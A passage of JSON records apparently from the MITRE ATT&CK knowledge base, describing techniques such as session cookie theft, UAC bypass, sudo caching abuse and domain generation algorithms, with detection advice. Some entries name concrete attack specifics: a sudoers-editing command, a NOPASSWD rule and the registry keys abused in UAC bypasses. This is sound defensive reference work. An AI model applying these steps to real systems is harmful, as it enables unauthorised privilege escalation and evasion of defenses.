["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-04-16T12:56:56.861Z", "name": "Steal Web Session Cookie", "description": "An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.\n\nCookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypasses some multi-factor authentication protocols.(Citation: Pass The Cookie)\n\nThere are several examples of malware targeting cookies from web browsers on the local system.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42 Mac Crypto Cookies January 2019) Adversaries may also steal cookies by injecting malicious JavaScript content into websites or relying on [User Execution](https://attack.mitre.org/techniques/T1204) by tricking victims into running malicious JavaScript in their browser.(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)\n\nThere are also open source frameworks such as `Evilginx2` and `Muraena` that can gather session cookies through a malicious proxy (e.g., [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)) that can be set up by an adversary and used in phishing campaigns.(Citation: Github evilginx2)(Citation: GitHub Mauraena)\n\nAfter an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004) technique to login to the corresponding web application.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Microsoft Threat Intelligence Center (MSTIC)", "Johann Rehberger", "Goldstein Menachem"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor for attempts to access files and repositories on a local system that are used to store browser session cookies. Monitor for attempts by programs to inject into or dump browser process memory.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Office 365", "SaaS", "Google Workspace"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--10ffac09-e42d-4f56-ab20-db94c67d76ff", "created": "2019-10-08T20:04:35.508Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1539", "external_id": "T1539"}, {"source_name": "Krebs Discord Bookmarks 2023", "description": "Brian Krebs. (2023, May 30). Discord Admins Hacked by Malicious Bookmarks. Retrieved January 2, 2024.", "url": "https://krebsonsecurity.com/2023/05/discord-admins-hacked-by-malicious-bookmarks/"}, {"source_name": "Unit 42 Mac Crypto Cookies January 2019", "description": "Chen, Y., Hu, W., Xu, Z., et. al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges\u2019 Cookies. Retrieved October 14, 2019.", "url": "https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/"}, {"source_name": "Kaspersky TajMahal April 2019", "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019.", "url": "https://securelist.com/project-tajmahal/90240/"}, {"source_name": "Github evilginx2", "description": "Gretzky, Kuba. (2019, April 10). Retrieved October 8, 2019.", "url": "https://github.com/kgretzky/evilginx2"}, {"source_name": "GitHub Mauraena", "description": "Orr\u00f9, M., Trotta, G.. (2019, September 11). Muraena. Retrieved October 14, 2019.", "url": "https://github.com/muraenateam/muraena"}, {"source_name": "Pass The Cookie", "description": "Rehberger, J. (2018, December). Pivot to the Cloud using Pass the Cookie. Retrieved April 5, 2019.", "url": "https://wunderwuzzi23.github.io/blog/passthecookie.html"}, {"source_name": "Talos Roblox Scam 2023", "description": "Tiago Pereira. (2023, November 2). Attackers use JavaScript URLs, API forms and more to scam users in popular online game \u201cRoblox\u201d. Retrieved January 2, 2024.", "url": "https://blog.talosintelligence.com/roblox-scam-overview/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Container Orchestration Job", "description": "Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.\n\nIn Kubernetes, a CronJob may be used to schedule a Job that runs one or more containers to perform specific tasks.(Citation: Kubernetes Jobs)(Citation: Kubernetes CronJob) An adversary therefore may utilize a CronJob to schedule deployment of a Job that executes malicious code in various nodes within a cluster.(Citation: Threat Matrix for Kubernetes)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Center for Threat-Informed Defense (CTID)", "Vishwas Manral, McAfee", "Yossi Weizman, Azure Defender Research Team"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor for the anomalous creation of scheduled jobs in container orchestration environments. Use logging agents on Kubernetes nodes and retrieve logs from sidecar proxies for application and resource pods to monitor malicious container orchestration job deployments. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Containers"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User"], "x_mitre_remote_support": true, "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--1126cab1-c700-412f-a510-61f4937bb096", "created": "2021-03-29T17:06:22.247Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1053/007", "external_id": "T1053.007"}, {"source_name": "Kubernetes CronJob", "description": "The Kubernetes Authors. (n.d.). Kubernetes CronJob. Retrieved March 29, 2021.", "url": "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/"}, {"source_name": "Kubernetes Jobs", "description": "The Kubernetes Authors. (n.d.). Kubernetes Jobs. Retrieved March 30, 2021.", "url": "https://kubernetes.io/docs/concepts/workloads/controllers/job/"}, {"source_name": "Threat Matrix for Kubernetes", "description": "Weizman, Y. (2020, April 2). Threat Matrix for Kubernetes. Retrieved March 30, 2021.", "url": "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Domain Generation Algorithms", "description": "Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)\n\nDGAs can take the form of apparently random or \u201cgibberish\u201d strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)\n\nAdversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Ryan Benson, Exabeam", "Barry Shteiman, Exabeam", "Sylvain Gil, Exabeam"], "x_mitre_detection": "Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.\n\nMachine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd", "created": "2020-03-10T17:44:59.787Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1568/002", "external_id": "T1568.002"}, {"source_name": "Cybereason Dissecting DGAs", "description": "Sternfeld, U. (2016). Dissecting Domain Generation Algorithms: Eight Real World DGA Variants. Retrieved February 18, 2019.", "url": "http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf"}, {"source_name": "Cisco Umbrella DGA", "description": "Scarfo, A. (2016, October 10). Domain Generation Algorithms \u2013 Why so effective?. Retrieved February 18, 2019.", "url": "https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/"}, {"source_name": "Unit 42 DGA Feb 2019", "description": "Unit 42. (2019, February 7). Threat Brief: Understanding Domain Generation Algorithms (DGA). Retrieved February 19, 2019.", "url": "https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/"}, {"source_name": "Talos CCleanup 2017", "description": "Brumaghin, E. et al. (2017, September 18). CCleanup: A Vast Number of Machines at Risk. Retrieved March 9, 2018.", "url": "http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html"}, {"source_name": "Akamai DGA Mitigation", "description": "Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of Domain Generation Algorithms. Retrieved February 18, 2019.", "url": "https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html"}, {"source_name": "FireEye POSHSPY April 2017", "description": "Dunwoody, M.. (2017, April 3). Dissecting One of APT29\u2019s Fileless WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.", "url": "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html"}, {"source_name": "ESET Sednit 2017 Activity", "description": "ESET. (2017, December 21). Sednit update: How Fancy Bear Spent the Year. Retrieved February 18, 2019.", "url": "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/"}, {"source_name": "Data Driven Security DGA", "description": "Jacobs, J. (2014, October 2). Building a DGA Classifier: Part 2, Feature Engineering. Retrieved February 18, 2019.", "url": "https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/"}, {"source_name": "Pace University Detecting DGA May 2017", "description": "Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically Generated Domains Using Data Visualization and N-Grams Methods . Retrieved April 26, 2019.", "url": "http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf"}, {"source_name": "Elastic Predicting DGA", "description": "Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November 2). Predicting Domain Generation Algorithms with Long Short-Term Memory Networks. Retrieved April 26, 2019.", "url": "https://arxiv.org/pdf/1611.00791.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Double File Extension", "description": "Adversaries may abuse a double extension in the filename as a means of masquerading the true file type. A file name may include a secondary file type extension that may cause only the first extension to be displayed (ex: File.txt.exe may render in some views as just File.txt). However, the second extension is the true file type that determines how the file is opened and executed. The real file extension may be hidden by the operating system in the file browser (ex: explorer.exe), as well as in any software configured using or similar to the system\u2019s policies.(Citation: PCMag DoubleExtension)(Citation: SOCPrime DoubleExtension) \n\nAdversaries may abuse double extensions to attempt to conceal dangerous file types of payloads. A very common usage involves tricking a user into opening what they think is a benign file type but is actually executable code. Such files often pose as email attachments and allow an adversary to gain [Initial Access](https://attack.mitre.org/tactics/TA0001) into a user\u2019s system via [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) then [User Execution](https://attack.mitre.org/techniques/T1204). For example, an executable file attachment named Evil.txt.exe may display as Evil.txt to a user. The user may then view it as a benign text file and open it, inadvertently executing the hidden malware.(Citation: SOCPrime DoubleExtension)\n\nCommon file types, such as text files (.txt, .doc, etc.) and image files (.jpg, .gif, etc.) are typically used as the first extension to appear benign. Executable extensions commonly regarded as dangerous, such as .exe, .lnk, .hta, and .scr, often appear as the second extension and true file type.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitor for files written to disk that contain two file extensions, particularly when the second is an executable.(Citation: Seqrite DoubleExtension)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--11f29a39-0942-4d62-92b6-fe236cf3066e", "created": "2021-08-04T20:54:03.066Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1036/007", "external_id": "T1036.007"}, {"source_name": "PCMag DoubleExtension", "description": "PCMag. (n.d.). Encyclopedia: double extension. Retrieved August 4, 2021.", "url": "https://www.pcmag.com/encyclopedia/term/double-extension"}, {"source_name": "SOCPrime DoubleExtension", "description": "Eugene Tkachenko. (2020, May 1). Rule of the Week: Possible Malicious File Double Extension. Retrieved July 27, 2021.", "url": "https://socprime.com/blog/rule-of-the-week-possible-malicious-file-double-extension/"}, {"source_name": "Seqrite DoubleExtension", "description": "Seqrite. (n.d.). How to avoid dual attack and vulnerable files with double extension?. Retrieved July 27, 2021.", "url": "https://www.seqrite.com/blog/how-to-avoid-dual-attack-and-vulnerable-files-with-double-extension/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Bypass User Account Control", "description": "Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)\n\nIf the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box.(Citation: TechNet Inside UAC)(Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows)\n\nMany methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:\n\n* eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)\n\nAnother bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}, {"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Stefan Kanthak", "Casey Smith"], "x_mitre_deprecated": false, "x_mitre_detection": "There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Monitor process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes.\n\nSome UAC bypass methods rely on modifying specific, user-accessible Registry settings. For example:\n\n* The eventvwr.exe bypass uses the [HKEY_CURRENT_USER]\\Software\\Classes\\mscfile\\shell\\open\\command Registry key.(Citation: enigma0x3 Fileless UAC Bypass)\n\n* The sdclt.exe bypass uses the [HKEY_CURRENT_USER]\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe and [HKEY_CURRENT_USER]\\Software\\Classes\\exefile\\shell\\runas\\command\\isolatedCommand Registry keys.(Citation: enigma0x3 sdclt app paths)(Citation: enigma0x3 sdclt bypass)\n\nAnalysts should monitor these Registry settings for unauthorized changes.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "2.1", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Windows User Account Control"], "x_mitre_effective_permissions": ["Administrator"], "x_mitre_permissions_required": ["Administrator", "User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073", "created": "2020-01-30T14:24:34.977Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1548/002", "external_id": "T1548.002"}, {"source_name": "Davidson Windows", "description": "Davidson, L. (n.d.). Windows 7 UAC whitelist. Retrieved November 12, 2014.", "url": "http://www.pretentiousname.com/misc/win7_uac_whitelist2.html"}, {"source_name": "TechNet How UAC Works", "description": "Lich, B. (2016, May 31). How User Account Control Works. Retrieved June 3, 2016.", "url": "https://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-works"}, {"source_name": "SANS UAC Bypass", "description": "Medin, T. (2013, August 8). PsExec UAC Bypass. Retrieved June 3, 2016.", "url": "http://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypass"}, {"source_name": "MSDN COM Elevation", "description": "Microsoft. (n.d.). The COM Elevation Moniker. Retrieved July 26, 2016.", "url": "https://msdn.microsoft.com/en-us/library/ms679687.aspx"}, {"source_name": "enigma0x3 Fileless UAC Bypass", "description": "Nelson, M. (2016, August 15). \"Fileless\" UAC Bypass using eventvwr.exe and Registry Hijacking. Retrieved December 27, 2016.", "url": "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/"}, {"source_name": "enigma0x3 sdclt app paths", "description": "Nelson, M. (2017, March 14). Bypassing UAC using App Paths. Retrieved May 25, 2017.", "url": "https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/"}, {"source_name": "enigma0x3 sdclt bypass", "description": "Nelson, M. (2017, March 17). \"Fileless\" UAC Bypass Using sdclt.exe. Retrieved May 25, 2017.", "url": "https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/"}, {"source_name": "TechNet Inside UAC", "description": "Russinovich, M. (2009, July). User Account Control: Inside Windows 7 User Account Control. Retrieved July 26, 2016.", "url": "https://technet.microsoft.com/en-US/magazine/2009.07.uac.aspx"}, {"source_name": "Fortinet Fareit", "description": "Salvio, J., Joven, R. (2016, December 16). Malicious Macro Bypasses UAC to Elevate Privilege for Fareit Malware. Retrieved December 27, 2016.", "url": "https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware"}, {"source_name": "Github UACMe", "description": "UACME Project. (2016, June 16). UACMe. Retrieved July 26, 2016.", "url": "https://github.com/hfiref0x/UACME"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Timestomp", "description": "Adversaries may take actions to hide the deployment of new, or modification of existing files to obfuscate their activities. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools. Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools. (Citation: WindowsIR Anti-Forensic Techniques)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Romain Dumont, ESET"], "x_mitre_detection": "Forensic techniques exist to detect aspects of files that have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques) It may be possible to detect timestomping using file modification monitoring that collects information on file handle opens and can compare timestamp values.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "Windows", "macOS"], "x_mitre_version": "1.1", "x_mitre_defense_bypassed": ["Host forensic analysis"], "x_mitre_permissions_required": ["User", "Administrator", "SYSTEM"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--128c55d3-aeba-469f-bd3e-c8996ab4112a", "created": "2017-05-31T21:31:12.675Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1099", "external_id": "T1099"}, {"source_name": "WindowsIR Anti-Forensic Techniques", "description": "Carvey, H. (2013, July 23). HowTo: Determine/Detect the use of Anti-Forensics Techniques. Retrieved June 3, 2016.", "url": "http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Internet Connection Discovery", "description": "Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), tracert, and GET requests to websites.\n\nAdversaries may use the results and responses from these requests to determine if the system is capable of communicating with their C2 servers before attempting to connect to them. The results may also be used to identify routes, redirectors, and proxy servers.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Command and Control, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to check Internet connectivity.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Linux", "macOS"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--132d5b37-aac5-4378-a8dc-3127b18a73dc", "created": "2021-03-17T15:28:10.689Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1016/001", "external_id": "T1016.001"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Sudo and Sudo Caching", "description": "Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.\n\nWithin Linux and MacOS systems, sudo (sometimes referred to as \"superuser do\") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The sudo command \"allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments.\"(Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a timestamp_timeout, which is the amount of time in minutes between instances of sudo before it will re-prompt for a password. This is because sudo has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at /var/db/sudo with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a tty_tickets variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).\n\nThe sudoers file, /etc/sudoers, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like user1 ALL=(ALL) NOPASSWD: ALL.(Citation: OSX.Dok Malware) Elevated privileges are required to edit this file though.\n\nAdversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, /var/db/sudo's timestamp can be monitored to see if it falls within the timestamp_timeout range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additional, if tty_tickets is disabled, adversaries can do this from any tty for that user.\n\nIn the wild, malware has disabled tty_tickets to potentially make scripting easier by issuing echo \\'Defaults !tty_tickets\\' >> /etc/sudoers.(Citation: cybereason osx proton) In order for this change to be reflected, the malware also issued killall Terminal. As of macOS Sierra, the sudoers file has tty_tickets enabled by default.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}, {"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the LOG_INPUT and LOG_OUTPUT directives in the /etc/sudoers file.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_effective_permissions": ["root"], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--1365fe3b-0f50-455d-b4da-266ce31c23b0", "created": "2020-01-30T14:34:44.992Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1548/003", "external_id": "T1548.003"}, {"source_name": "sudo man page 2018", "description": "Todd C. Miller. (2018). Sudo Man Page. Retrieved March 19, 2018.", "url": "https://www.sudo.ws/"}, {"source_name": "OSX.Dok Malware", "description": "Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web traffic. Retrieved July 10, 2017.", "url": "https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/"}, {"source_name": "cybereason osx proton", "description": "Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually Does. Retrieved March 19, 2018.", "url": "https://www.cybereason.com/blog/labs-proton-b-what-this-mac-malware-actually-does"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-10-13T17:56:59.396Z", "name": "Loss of View", "description": "Adversaries may cause a sustained or permanent loss of view where the ICS equipment will require local, hands-on operator intervention; for instance, a restart or manual operation. By causing a sustained reporting or visibility loss, the adversary can effectively hide the present state of operations. This loss of view can occur without affecting the physical processes themselves. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay)", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "impact"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--138979ba-0430-4de6-a128-2fc0b056ba36", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0829", "external_id": "T0829"}, {"source_name": "Corero", "description": 